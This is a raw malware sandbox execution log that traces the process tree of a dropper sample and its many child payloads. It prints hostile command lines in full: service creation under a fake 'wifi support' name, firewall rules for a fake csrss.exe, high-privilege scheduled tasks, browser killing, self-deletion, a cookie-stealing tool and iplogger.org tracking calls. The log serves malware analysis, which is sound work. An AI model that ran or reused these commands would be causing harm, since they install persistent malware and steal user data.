PID 3136 wrote to memory of 4996	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	pub2.exe
PID 3136 wrote to memory of 4996	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	pub2.exe
PID 3136 wrote to memory of 4996	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	pub2.exe
PID 3136 wrote to memory of 5060	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	jamesdirect.exe
PID 3136 wrote to memory of 5060	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	jamesdirect.exe
PID 3136 wrote to memory of 5060	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	jamesdirect.exe
PID 3136 wrote to memory of 2756	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Litever01.exe
PID 3136 wrote to memory of 2756	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Litever01.exe
PID 3136 wrote to memory of 2756	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Litever01.exe
PID 3136 wrote to memory of 5044	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Complete.exe
PID 3136 wrote to memory of 5044	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Complete.exe
PID 3136 wrote to memory of 5044	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Complete.exe
PID 3136 wrote to memory of 1572	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	md9_1sjm.exe
PID 3136 wrote to memory of 1572	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	md9_1sjm.exe
PID 3136 wrote to memory of 1572	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	md9_1sjm.exe
PID 2088 wrote to memory of 1176	2088	Folder.exe	Folder.exe
PID 2088 wrote to memory of 1176	2088	Folder.exe	Folder.exe
PID 2088 wrote to memory of 1176	2088	Folder.exe	Folder.exe
PID 4660 wrote to memory of 2584	4660	Install.exe	cmd.exe
PID 4660 wrote to memory of 2584	4660	Install.exe	cmd.exe
PID 4660 wrote to memory of 2584	4660	Install.exe	cmd.exe
PID 2584 wrote to memory of 4100	2584	cmd.exe	taskkill.exe
PID 2584 wrote to memory of 4100	2584	cmd.exe	taskkill.exe
PID 2584 wrote to memory of 4100	2584	cmd.exe	taskkill.exe
PID 1932 wrote to memory of 2008	1932	Files.exe	jfiag3g_gg.exe
PID 1932 wrote to memory of 2008	1932	Files.exe	jfiag3g_gg.exe
PID 1932 wrote to memory of 2008	1932	Files.exe	jfiag3g_gg.exe
PID 3884 wrote to memory of 1996	3884	rUNdlL32.eXe	rundll32.exe
PID 3884 wrote to memory of 1996	3884	rUNdlL32.eXe	rundll32.exe
PID 3884 wrote to memory of 1996	3884	rUNdlL32.eXe	rundll32.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 2508	5024	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe
"C:\Users\Admin\AppData\Local\Temp\f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2764

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2008

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xb0,0x104,0x7ffd2bcd46f8,0x7ffd2bcd4708,0x7ffd2bcd4718
3⤵
PID:1268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2636 /prefetch:2
3⤵
PID:2508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2960 /prefetch:3
3⤵
PID:2712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 /prefetch:8
3⤵
PID:2776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
3⤵
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
3⤵
PID:4960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:8
3⤵
PID:4456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
3⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
3⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:6188

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff6b3415460,0x7ff6b3415470,0x7ff6b3415480
4⤵
PID:6452

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:8
3⤵
PID:6256

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:8
3⤵
PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16580407859308838719,1802223628854893330,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5316 /prefetch:2
3⤵
PID:3448

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2088

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:1176

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:6216

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:5156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 732
4⤵
- Program crash
PID:5836

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 780
3⤵
- Program crash
PID:4420

C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe
"C:\Users\Admin\AppData\Local\Temp\cleanpro22.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1204

C:\Users\Admin\Documents\nvUrDkI4ZjeCnc7zzVYqdFLb.exe
"C:\Users\Admin\Documents\nvUrDkI4ZjeCnc7zzVYqdFLb.exe"
3⤵
PID:1796

C:\Users\Admin\Documents\6B7b4wTJwfaJYPxQ2FhbB98c.exe
"C:\Users\Admin\Documents\6B7b4wTJwfaJYPxQ2FhbB98c.exe"
3⤵
PID:5528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\adxzsglt\
4⤵
PID:4512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vrtyzfal.exe" C:\Windows\SysWOW64\adxzsglt\
4⤵
PID:4848

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create adxzsglt binPath= "C:\Windows\SysWOW64\adxzsglt\vrtyzfal.exe /d\"C:\Users\Admin\Documents\6B7b4wTJwfaJYPxQ2FhbB98c.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5184

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description adxzsglt "wifi internet conection"
4⤵
PID:5464

C:\Users\Admin\akxfpjno.exe
"C:\Users\Admin\akxfpjno.exe" /d"C:\Users\Admin\Documents\6B7b4wTJwfaJYPxQ2FhbB98c.exe"
4⤵
PID:5240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cbvqqery.exe" C:\Windows\SysWOW64\adxzsglt\
5⤵
PID:5420

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config adxzsglt binPath= "C:\Windows\SysWOW64\adxzsglt\cbvqqery.exe /d\"C:\Users\Admin\akxfpjno.exe\""
5⤵
PID:5960

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start adxzsglt
5⤵
PID:6008

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3802.bat" "
5⤵
PID:3968

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5500

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start adxzsglt
4⤵
PID:1200

C:\Users\Admin\Documents\ETiwmSc_eRA6I43bkbphAs5J.exe
"C:\Users\Admin\Documents\ETiwmSc_eRA6I43bkbphAs5J.exe"
3⤵
PID:4240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:6180

C:\Users\Admin\Documents\wlw7rHeiCjpjABxFtjnv_NAR.exe
"C:\Users\Admin\Documents\wlw7rHeiCjpjABxFtjnv_NAR.exe"
3⤵
PID:4364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:6936

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:3924

C:\Users\Admin\Documents\MWgLX0WClryFTEsE5WOPA2Ys.exe
"C:\Users\Admin\Documents\MWgLX0WClryFTEsE5WOPA2Ys.exe"
3⤵
PID:4180

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:6704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:6460

C:\Users\Admin\Documents\E6I0sxmGVWLjkgPKUbFQrYW6.exe
"C:\Users\Admin\Documents\E6I0sxmGVWLjkgPKUbFQrYW6.exe"
3⤵
PID:5184

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5484

C:\Users\Admin\Documents\GUGmfzG0sXRESqUfSHOvnyRB.exe
"C:\Users\Admin\Documents\GUGmfzG0sXRESqUfSHOvnyRB.exe"
3⤵
PID:5904

C:\Users\Admin\Documents\36raY7Em4HSuzVLJmLV3wZzB.exe
"C:\Users\Admin\Documents\36raY7Em4HSuzVLJmLV3wZzB.exe"
3⤵
PID:3388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:308

C:\Users\Admin\Documents\lFtkYj3JomqnDGFaI6vW1Out.exe
"C:\Users\Admin\Documents\lFtkYj3JomqnDGFaI6vW1Out.exe"
3⤵
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 460
4⤵
- Program crash
PID:6624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 468
4⤵
- Program crash
PID:7024

C:\Users\Admin\Documents\IgaLvSnUfOONT7dNtxe0VnZO.exe
"C:\Users\Admin\Documents\IgaLvSnUfOONT7dNtxe0VnZO.exe"
3⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im IgaLvSnUfOONT7dNtxe0VnZO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\IgaLvSnUfOONT7dNtxe0VnZO.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5724

C:\Windows\SysWOW64\taskkill.exe
taskkill /im IgaLvSnUfOONT7dNtxe0VnZO.exe /f
5⤵
- Kills process with taskkill
PID:3928

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:6300

C:\Users\Admin\Documents\4aR_6HU2X9CRul7WauzMAubZ.exe
"C:\Users\Admin\Documents\4aR_6HU2X9CRul7WauzMAubZ.exe"
3⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 616
4⤵
- Program crash
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 636
4⤵
- Program crash
PID:6444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 644
4⤵
- Program crash
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 652
4⤵
- Program crash
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 772
4⤵
- Program crash
PID:5216

C:\Users\Admin\Documents\dJmGePlQutnH9AtZ1IiXkyDl.exe
"C:\Users\Admin\Documents\dJmGePlQutnH9AtZ1IiXkyDl.exe"
3⤵
PID:3108

C:\Users\Admin\Documents\CkAUJfybzXB8PICo3Ddl2SEi.exe
"C:\Users\Admin\Documents\CkAUJfybzXB8PICo3Ddl2SEi.exe"
3⤵
PID:5988

C:\Users\Admin\Documents\1Ak5sC4PNB9lvfYr2pD0kU1U.exe
"C:\Users\Admin\Documents\1Ak5sC4PNB9lvfYr2pD0kU1U.exe"
4⤵
PID:4604

C:\Users\Admin\Pictures\Adobe Films\R8ZmJNdpTW4kFTT5Zqpmd9mX.exe
"C:\Users\Admin\Pictures\Adobe Films\R8ZmJNdpTW4kFTT5Zqpmd9mX.exe"
5⤵
PID:5312

C:\Users\Admin\Pictures\Adobe Films\iOWORGY85aplQ1praPvhwNzJ.exe
"C:\Users\Admin\Pictures\Adobe Films\iOWORGY85aplQ1praPvhwNzJ.exe"
5⤵
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 624
6⤵
- Program crash
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 632
6⤵
- Program crash
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 660
6⤵
- Program crash
PID:6484

C:\Users\Admin\Pictures\Adobe Films\_XpdsqwQd1UuN1HUemR2UuS8.exe
"C:\Users\Admin\Pictures\Adobe Films\_XpdsqwQd1UuN1HUemR2UuS8.exe"
5⤵
PID:6916

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:3536

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:7032

C:\Users\Admin\Pictures\Adobe Films\uaPC1TiM69OoqOLq8M0wPxuJ.exe
"C:\Users\Admin\Pictures\Adobe Films\uaPC1TiM69OoqOLq8M0wPxuJ.exe"
5⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\7zSFD83.tmp\Install.exe
.\Install.exe
6⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\7zS134D.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:5116

C:\Users\Admin\Pictures\Adobe Films\Uvt1u2AaB6kHztel6qWTCII8.exe
"C:\Users\Admin\Pictures\Adobe Films\Uvt1u2AaB6kHztel6qWTCII8.exe"
5⤵
PID:5552

C:\Users\Admin\Pictures\Adobe Films\Y0dQWdznwipEWC2RfFzsDulD.exe
"C:\Users\Admin\Pictures\Adobe Films\Y0dQWdznwipEWC2RfFzsDulD.exe"
5⤵
PID:3908

C:\Users\Admin\Pictures\Adobe Films\O8CKztSwm6JiaNfJr_Kz8ZSr.exe
"C:\Users\Admin\Pictures\Adobe Films\O8CKztSwm6JiaNfJr_Kz8ZSr.exe"
5⤵
PID:628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:4540

C:\Users\Admin\Pictures\Adobe Films\Ad5eCdgygglsXjNQXE8ADY4G.exe
"C:\Users\Admin\Pictures\Adobe Films\Ad5eCdgygglsXjNQXE8ADY4G.exe"
5⤵
PID:3068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3068 -s 900
6⤵
- Program crash
PID:4600

C:\Users\Admin\Pictures\Adobe Films\8R97aQeubymimE9KRkRyvuFT.exe
"C:\Users\Admin\Pictures\Adobe Films\8R97aQeubymimE9KRkRyvuFT.exe"
5⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
6⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\7596I.exe
"C:\Users\Admin\AppData\Local\Temp\7596I.exe"
7⤵
PID:6220

C:\Users\Admin\AppData\Local\Temp\7596I.exe
C:\Users\Admin\AppData\Local\Temp\7596I.exe
8⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\I15DB.exe
"C:\Users\Admin\AppData\Local\Temp\I15DB.exe"
7⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\I15DB.exe
"C:\Users\Admin\AppData\Local\Temp\I15DB.exe"
7⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\I15DB.exe
"C:\Users\Admin\AppData\Local\Temp\I15DB.exe"
7⤵
PID:3188

C:\Users\Admin\AppData\Local\Temp\MJHJJ.exe
"C:\Users\Admin\AppData\Local\Temp\MJHJJ.exe"
7⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\AM6J5D8D2BC2FL2.exe
https://iplogger.org/1QuEf7
7⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\AM6J5.exe
"C:\Users\Admin\AppData\Local\Temp\AM6J5.exe"
7⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\yanzhang.exe
"C:\Users\Admin\AppData\Local\Temp\yanzhang.exe"
6⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\yanzhang.exe
"C:\Users\Admin\AppData\Local\Temp\yanzhang.exe" -h
7⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:4472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4472 -s 268
7⤵
- Program crash
PID:3644

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
6⤵
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bngxgkok.eg7.bat""
7⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
6⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
6⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\ip.exe
"C:\Users\Admin\AppData\Local\Temp\ip.exe"
6⤵
PID:3092

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:6524

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
